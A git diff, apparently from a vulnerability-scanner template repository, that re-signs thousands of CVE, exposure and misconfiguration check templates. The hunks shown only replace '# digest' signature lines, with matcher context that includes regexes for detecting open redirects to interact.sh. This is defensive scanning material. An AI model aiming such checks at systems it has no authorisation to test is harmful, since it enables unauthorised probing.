http/default-logins/camunda/camunda-default-login.yaml | 2 +- http/exposed-panels/goodjob-dashboard.yaml | 2 +- http/exposed-panels/onlyoffice-login-panel.yaml | 2 +- http/exposed-panels/vue-pacs-panel.yaml | 2 +- http/exposed-panels/woodwing-panel.yaml | 2 +- http/exposures/backups/zip-backup-files.yaml | 2 +- http/exposures/docker-daemon-exposed.yaml | 2 +- http/misconfiguration/apache/apache-server-status.yaml | 2 +- http/misconfiguration/aws/cdn-cache-poisoning.yaml | 2 +- http/misconfiguration/gitlab/gitlab-public-signup.yaml | 2 +- http/misconfiguration/h2o/h2o-arbitary-file-read.yaml | 2 +- http/misconfiguration/h2o/h2o-dashboard.yaml | 2 +- http/misconfiguration/installer/espocrm-installer.yaml | 2 +- http/misconfiguration/mixed-active-content.yaml | 2 +- http/misconfiguration/mixed-passive-content.yaml | 2 +- http/misconfiguration/php/php-composer-binary.yaml | 2 +- http/misconfiguration/woodwing-git.yaml | 2 +- http/misconfiguration/woodwing-phpinfo.yaml | 2 +- http/osint/piratebay.yaml | 2 +- http/technologies/bamboo-detect.yaml | 2 +- http/technologies/iparapheur-detect.yaml | 2 +- http/token-spray/api-openai.yaml | 2 +- .../vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml | 2 +- http/vulnerabilities/dlink/dlink-netgear-xss.yaml | 2 +- http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml | 2 +- http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml | 2 +- http/vulnerabilities/other/sslvpn-client-rce.yaml | 2 +- http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml | 2 +- http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml | 2 +- http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml | 2 +- javascript/cves/2016/CVE-2016-8706.yaml | 2 +- javascript/cves/2023/CVE-2023-34039.yaml | 2 +- javascript/cves/2023/CVE-2023-46604.yaml | 2 +- javascript/network/smb/smb-anonymous-access.yaml | 2 +- javascript/network/smb/smb-shares.yaml | 2 +- javascript/network/smb/smb-signing-not-required.yaml | 2 +- javascript/network/smb/smb2-capabilities.yaml | 2 +- network/cves/2016/CVE-2016-2004.yaml | 2 +- network/cves/2016/CVE-2016-3510.yaml | 2 +- network/cves/2017/CVE-2017-3881.yaml | 2 +- network/cves/2017/CVE-2017-5645.yaml | 2 +- network/cves/2018/CVE-2018-2628.yaml | 2 +- network/cves/2018/CVE-2018-2893.yaml | 2 +- network/cves/2020/CVE-2020-11981.yaml | 2 +- network/cves/2020/CVE-2020-1938.yaml | 2 +- network/cves/2020/CVE-2020-7247.yaml | 2 +- network/cves/2021/CVE-2021-44521.yaml | 2 +- network/cves/2022/CVE-2022-24706.yaml | 2 +- network/cves/2022/CVE-2022-31793.yaml | 2 +- network/misconfig/erlang-daemon.yaml | 2 +- 2280 files changed, 2280 insertions(+), 2282 deletions(-) diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index cdc7f7a731..e0ef3fd676 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -63,4 +63,4 @@ dns: part: answer words: - "IN\tA" -# digest: 4b0a004830460221008d223bfdb3585e335e8282ca206945a6f7704dab4a2899d3410229bf0db7132d022100b9de9af2b393a559575b67a5b25b6334fe8cddd1ceed5059ee634dc3b0292d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f91b6621181f8a7317c1ffc179ec2b81e33c8dd0dd28cc4871b13ffbb794ce84022100e7424a97fab1f6b745d735e7dad8f13b08ad36732b24216ae2826611af634318:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/azure-website-enum.yaml b/cloud/enum/azure-website-enum.yaml index f4e00a8375..90f58d1f32 100644 --- a/cloud/enum/azure-website-enum.yaml +++ b/cloud/enum/azure-website-enum.yaml @@ -34,4 +34,4 @@ http: - 200 - 302 condition: or -# digest: 490a00463044022001ff1a4cff9e33f3817df1e824a00e35f76c6f8e22cd34e3616e452978dc46f702200913c7710eba2b3df98325a1bb7da86b55cde6d4a3d7199a7d952f1f7988a3fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e87fb6ea9b294616dce1e74e429d8a83672921a242d1b3421a0c553eba83894022100bf53c3468808e2316f9194022db3618093873de428109de1984d0664f6bc89ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-app-engine-enum.yaml b/cloud/enum/gcp-app-engine-enum.yaml index ccafdb7c3b..5a856acb82 100644 --- a/cloud/enum/gcp-app-engine-enum.yaml +++ b/cloud/enum/gcp-app-engine-enum.yaml @@ -40,4 +40,4 @@ http: - "status_code==302" - contains(location, "login") condition: and -# digest: 490a0046304402204edc5a3fc90ff80b8397219e37a716d5b582c9821dbb0edda2c52c585aa241ca022067b0c7178f7f345975f765bdd56afc967505028e459ed113c8fbd450a1dcb76a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022017250b6b9f7ccf30e614e7bfb992e2e9ec13fd27556137cf4b13dc2f2a8c70b602200e352bbaebbd9dfbced84b3f9dff65c9d1b3dac47a0eec812b738a987931a14c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-bucket-enum.yaml b/cloud/enum/gcp-bucket-enum.yaml index a6ab5adab0..e4cbd6c5fa 100644 --- a/cloud/enum/gcp-bucket-enum.yaml +++ b/cloud/enum/gcp-bucket-enum.yaml @@ -37,4 +37,4 @@ http: name: "Protected GCP Bucket" status: - 403 -# digest: 490a004630440220549241cfe0dbdadf24bcbdabd6cbf8e82a45bea577710e8409da53f3bdef37d202203bab8b09dea7b68aafc32f8214b331ee6dc4dbe85c0e7a34693b8062dec6fb6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100baff7bb9e12a115a59a755c8188c3544cc8497dc3a17860023486de9f4992def02210096b193c8507208f3d30cd9fc716d4be46cd9acb83418f2fa62f0d10ce305d026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-firebase-app-enum.yaml b/cloud/enum/gcp-firebase-app-enum.yaml index ddbcc30957..543dfadc12 100644 --- a/cloud/enum/gcp-firebase-app-enum.yaml +++ b/cloud/enum/gcp-firebase-app-enum.yaml @@ -32,4 +32,4 @@ http: name: "Open GCP Firebase App" status: - 200 -# digest: 490a004630440220721a516d58d71b3c20990c97c22986fd212caafa366f2641bdb4fe9df0a53f9802205ecd4bfcda0808d5002e9d1194e0ec0f4d2b2f2140170c0df4ffb11372a6470f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022065f44c35d042a0e98f90303a7f4181c0644c2e2fb8c7344c42d13104f89a454a022100cf17441e1fdb9ae05d7bdfca68f98abf3a4794b4d24e8ec69083e6323e96c39f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/gcp-firebase-rtdb-enum.yaml b/cloud/enum/gcp-firebase-rtdb-enum.yaml index 8393680173..1ecd1e40ad 100644 --- a/cloud/enum/gcp-firebase-rtdb-enum.yaml +++ b/cloud/enum/gcp-firebase-rtdb-enum.yaml @@ -48,4 +48,4 @@ http: name: "Deactivated GCP Firebase RTDB" status: - 423 -# digest: 490a0046304402200dcb47ae02c77c619eea0d95a6ab7dc9f2be071cea09abee3a7ab748b11e561c022034956ced05346f9cfcc9d425d92fa1242c979572e8ae02030496597f64ccfe82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207b555ae31d639c4a2fa71c2988103f8eb74cd24ca8b3304e33059facb0c9275f02203b74c0ab6645d3c30970046284fffbea86b75f0bcf40192f6021b2297b616b7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2023/CVE-2023-49105.yaml b/code/cves/2023/CVE-2023-49105.yaml index 342690ac65..924b2c519e 100644 --- a/code/cves/2023/CVE-2023-49105.yaml +++ b/code/cves/2023/CVE-2023-49105.yaml @@ -86,4 +86,4 @@ http: - type: dsl dsl: - '"Username => "+ username' -# digest: 4a0a00473045022100f17bb3bb403b74c4e84e6190df79bf767df834017742b4b95607de42a3d948bb02205f2f1de3f09d31920d6bf102ba93c1ad271809327b5997d8d58e9f97f2886c11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f1395fdef2764cce1bd751a6a94c3f89afc0fb10d9437288388d31d6460a983002203d431b3492fa8d2501b3387ae3cf0f975385c21f7ac74d2deafcf878645c6f45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index bf9de401ab..07747f655a 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -70,4 +70,4 @@ headless: words: - "swagger" case-insensitive: true -# digest: 4b0a00483046022100d805a655b1da7c4ffb5a6cf0d1ff3a10547b6e0a4e755f0a6cb104d48ee11057022100a2b518e4335e2691b470df2630c3a2fb69f0f6b5de042d71b0783a51206b4382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d2c4f6c99e19c9617e208cc65e4ae8878b1e0f78ce754fde797ab2423024ecd0221008225ba508361199dec70fec6b61799973fd1fc7ba83eaab4f46e4893b3de62a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index df301a085b..687abbbafb 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d75cf6bb5b96928d10a267c9d3b68c6d215cafe2f946fc1e3c6faa5ba73986d1022100cf0262c0fa9aa5da8c6f8751c553cc77be07ca9fc62f3aec8bb35a8b9f16b490:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207a313d7af0bc61b06a7aad51917107f695550ad08a26e2a14f08c21800e83d750221009d18bf0ba9ffe17a4ed9d2dfcf6469d2a043290dc3176391f4382ac302fab0de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index b8dc5888d6..7d8eee948d 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201446b3c9bf46dead91bf4ef4ad77cbe180d6d69fb175901a10fa0c1ede45e8640221009f8fada5bf28bf8ede431e3ef75a13367f4164a18df286db6e1528ed038181da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f500597dac602cf617f29345b26e201c4d927ac567ff15851e270cca11ea1272022100890d6111631f224e22f99c1eb4ba645f25661a55ad8ca32ad947435cf6dfbc03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index e7b5919a47..a4252088fd 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220097cefba0b33bb087a8dba970ed43866b17c92bfc316e2e3d619b9b6485b57710221009ad2de84214b6c521984839454d0766d906957945e2b51dce527cd4c0cc82c50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220681d6f9fce50e9f265efb0d1f7647ecd089ff9ccd82a40f16fdf4ad7e3431fa6022100c14e5ae2bad4efe13871a4056d1ad91730a76abceec6b1efc96d074145c02964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 79c251cbae..08820ce302 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009838e283e3afa06a62182a21bc8b0059f223c7716b521ee426f5a5971f3feadf022100dd82c1e652cb490cb66a1a96bc0aca2beecdf45fedf86f75b5376ac8fc69c6d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d78a13dcb9079f37a061af29ff6d21b3ed62a07a726550f471ead2e767c580702204fa3e770b4a79151143e2c1fc69911fc440a994d57dfd6acf26152c7b6aac3aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 622ee34793..08d5849536 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100aa37066896608be1f1389ed813b9756b52f89f2581a494bf04c0e91f743d7cd3022012425b62227648da21636d2b3acaa1fdb865e29f57e39c13c84e0e2511f4c908:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220525b5e9c86de76ea31a9df228cb343498d9e8af2377340572abb80efa1ce40a0022100b91e7f5a199d6911814ef0e96cc896113d494ffd5806b2c676a07afb3a73c24a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 37a3e391e6..2c65225a07 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202fa68c993471257cf8942b7addbd0c8ba10500cf91c42f00109404cec47f6af0022100e5d9e9567e00ffecb85211757541b21325517ca1cba3705fa3c8e4437bf71706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008aa654f027a3408c2bc281a419c6b0d75390f66659f4628151acc1f0ff9c00b2022064a471d47316d179a73f297b91969c8be23a499f8acb4b5d08bbde3577c8ee7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index f0e5f6285a..d5a323cde8 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022012df863c30fb119eab34b1e075cfc549f79b962d5ee0256cc191605f184b042c022100ee6d6910021f8368041415f1c29568a224afa0bd4c90711c6ecef91e15f67a13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e301d145cce31b97f54573b5bf6d7329a640c6e6912952b1aca3cba636a5a62f02206a43c7ce36603d0de6d6c6e8e179b725f4382b16ace5274e87dcb6106df29144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index fcc07f8047..8e70637ecb 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100bd85215e179a268944da628fd2825c25be84f1d781f2eb54871fa7e3e13d9e9e022100d3ddb1c0a27197923318f0dd20a6ba42024cfd43b86ef1ab690f72558f0d6c36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d036caf16d382fdfbe9af09e2318230dd72b82b2cd436ccfa0dca452e2816c2e022100e9f463dbdbd874d3feb6884e33826439a9ff6865718dc9b271d1d343681f710c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 409dc9f51f..ed95f87188 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207b167d92c80698ced12089ab60b5599c68ac644764fc7c498b54ba3b419645a7022100df03e54fcb0545995de5efa160937f4291cc667f1492d78e48ce8afcff374056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f9d68051fcfd3a29b9e0bed031850568bd00ab8d0694a7ef67e3d20ea825e16a022005b68c6721854bdeba367f8b0dd350a0d52aa208a5cb28d739b0d462e72c9333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 6b318093fe..703ba95bb3 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200a624286010449dfbca736566eca4b83ef242b54957df99d637e088e9f74d226022100df79ccce801ecbe05018cb6c9e29bc7f6acf5836a0f68bc4640d5c55a8fdbdbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4828aeac9c75c0f41afdb3b237b3c99f674d6b2ef48b5bdf3a7d05bf3edf53e02206315a79698e98d45337626b1846a957c558198f936431af28069a25f1bf73dc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index a57d2db84b..24bcbb4dcb 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022070351a9e8db3cd73242680b18ba040226de4685b2c47e1382a982513fb0fc4f6022100e11c42b749f6d407caa47bb25997db8749ff4658e5d89ccf2215774153751083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b9704d7ac6d1fa5a36db9bd2aaf0decf98d559f8f39546fc10ba3c3286b535a022100ee1632a35ebb44ddf5793761cafc57ae63474e04676b7fc45074ac74997d6578:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index d0c6996e64..6de5041c16 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c7c321100cb8ef9ae2e72f69b3339fbd735942dbfb11365ce3f1e0a1c907236b02204b8b12c8b14e2d00685cbcdbe831aa03f49d501bc3d50b1987a4bf26b8a8e994:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a2887a4a011d195cc34cf71a7a0747f9c287c37e0290029074917bfc3bf91af0221009d4d6050db82f4d260d632a1aeba31fc2bc837980a1c88e9b4dd4d50635b8f4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index d2592e484e..ff97901ff4 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b096332d183a0234d0cbd3bfbc4b5149fddfbfe961ca49519ef85975a12413e50221008eee0c4a8fbdcd33a40800400dd5bd396f02ffb63cb375616260a0d10b0fce8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203bb71f60d7bc5bcf4f7fae7d79a65b6c484cf6b84df42ce2209006d468978a3702205da84161f1b1c9d69b8d65abfa84136b1aa48d8add38562c53b00d7410da1314:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 85be107393..5e20aba012 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100efb00dfbe2fbe5543741c32ac6e81e36f307f5d67597644c0e036fb51692ea570220191deb545db561480334ffe98f010ae2ca82883fae8e71451c75675f56ee4501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a659cb38aeaf9ca2d6e91a39765be5b2c9ef339e4abb415a0dbfb84784c2540102201b7901ee562bd486ae118e410797d29f9e8341a8d781be3f8ad75b2136448fcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 96e94ca71e..1dcac14e00 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc5ae294908867ea9cfb3d84402f9150ea3eba52581a1435594505653c59b4a902202749fa215a1e51172d887e6a52ca776e6530f8537f8df687fba7ed249836eb6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008741620f592a5783f2b931bb7b41461ad7754d3a855105b94b756dabd9fb74d9022100d186254f4490a54842a0e16f2dd891f467053258daa5ac7d1b2c13dc139669b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index b3176eb785..2ebbf01838 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202baf6dbc687b03d671808dd265b4bd483e0db5122a79101074736b0280a3b8a6022100fe1672451273fca5b4feda5dac2ed3961821928bc670fa6690bb5a5816910bd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f9d4f5cd7b7090fc63036cb4866d5a19ba25d7d9188729ab6fa5567d666bc910220128122232036dbd12898812f7aa9c65e5a589b7c5a0c40605dcf088cfc8b837f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 7badc347fa..4eadc5ddec 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d8a1715cd99d2a316fc96a49ad96d5fcb9e60d314fa0227f341da5c5964d63d1022034fc66ce4d2ff88c7bbaad9997d6a4da683cffe1a97d693b84d3918d4654d340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220534faec41eee4206affe2e6326836529137a3b7ce55c9de53fe0fa220e4f7f6e0220382f02df5da8bc24e2bc07d56278487f91b746be00b9ef69d3eec51c0e0a08a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 582192e6e5..299e828467 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -42,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044022042de3ed0e9fbe496c588f3edb67152006b98090716fbf000556dc8edaf836bf9022056dc3d31d210a950d8ddc0f728c2e9712fe5ec45775636b0fbb655b92a58e095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210094f038e3bce034d435b93a959106aa258ecaf5e5120fa9ddb916f0a561b2dbdc02207716c4598887f6ea8d22cddc2ab3d6cd16f31bdbacab792549139fa180df8774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index 8ca162d26f..c0acc7aa1d 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022042436195e99587054a6a10ee089470c1fadab498fe1b556fc0cdcde579d92d5602201b1af0719bba0f8007ca800e10004e6be93d7ec53b7ec4fe0f627c5372dcdca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f9c359ffb9faf32ff5fc0fb43f61cd7b2bd37e6be9114acf48e5185607178bc6022100c7997ec31b81536d286f7779931a5a298c70745b13d99e323f38c9df9672b06c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 4e54d8f514..1181b629f6 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bbdf518966c75a44af19b519ed2a3d642aced2b7aaff600afa01c21c5509066f0221009c184332053f598d45bba3340388cadda4c7c8b8dabdb66884deea62912365b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100baa8ee591c8440e6668b12c357528938dbbf22644498e33c452cc22f60aaccd70221008a9561bbba4b70a1ffd7025d54cd0280b0e3d8287aa26f643638916cf13ce84c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index abe1048991..84d22c4f39 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206851937b7e99292685636e8eef2e6b0b33d2b8d19446ba160013767d605e5fbb0220103e5f70323feb34b2b691f0e0fc3c7c89a457f0e351756ea16091a69d38e1c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ff070a310f1da50db2a6e26f104013d403ee0e828c37e851d935812b53969e3022100fd7a0cea42f6a71205081822384107faf54cbeae79310a9cd2ad5c30a00aa588:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index ed55011b20..bcf5a9bdca 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220792bc10972df7ba62d45d1c803d425aa11df27db44bee2a3a2733f07405d2b50022100916d23ca8f6f78f6f62030bbc2fcedccbe0b4e36bdb5fbc2bcc1a249015e14ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008930ebb7c77056caef543e12c5e64cb4017ec9ad96be7d19fe868ba6eb121bb00221009859d45244b9025c4d4a762bae5e803e8cef51ebbac2f5cb22d1a5d0480886c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 3f196ce65a..90bcd16ae0 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ad5280aa6eac0929495f63d9882328a6c7dfd9bc0e135183d17a7c4cbc1e741e02203c987c6747a3bd616cd71adf3e491eeaee52d52f4dc1c2e0d5041d063956d83c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb4daa9c228b923a61c5e11388e2e42c7b6505fe615664172911ca0429dd5ff8022077c9aa14bb0dfd6d7e046e8bce05a14403d5f060388baa3c9df3ae42469cdb77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index cd6c61fb3f..16789c9c90 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e01b4968812ad7ad9b056cd634b2606c5650c02cf33012f5aef863b48bc969340220533ab0def58e9b6e81e56a8ae60e8116c2a03ef694aa21fc9601afd4798bce87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009384febc8f10d63b8b413529399db243190d6dbb5358f93e49a4ce21e6a0254a02207050893383981844a9b789e9592db43d54964f08e21fd770c4ffaca17e76473a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index b24878a1c6..726bcfa542 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 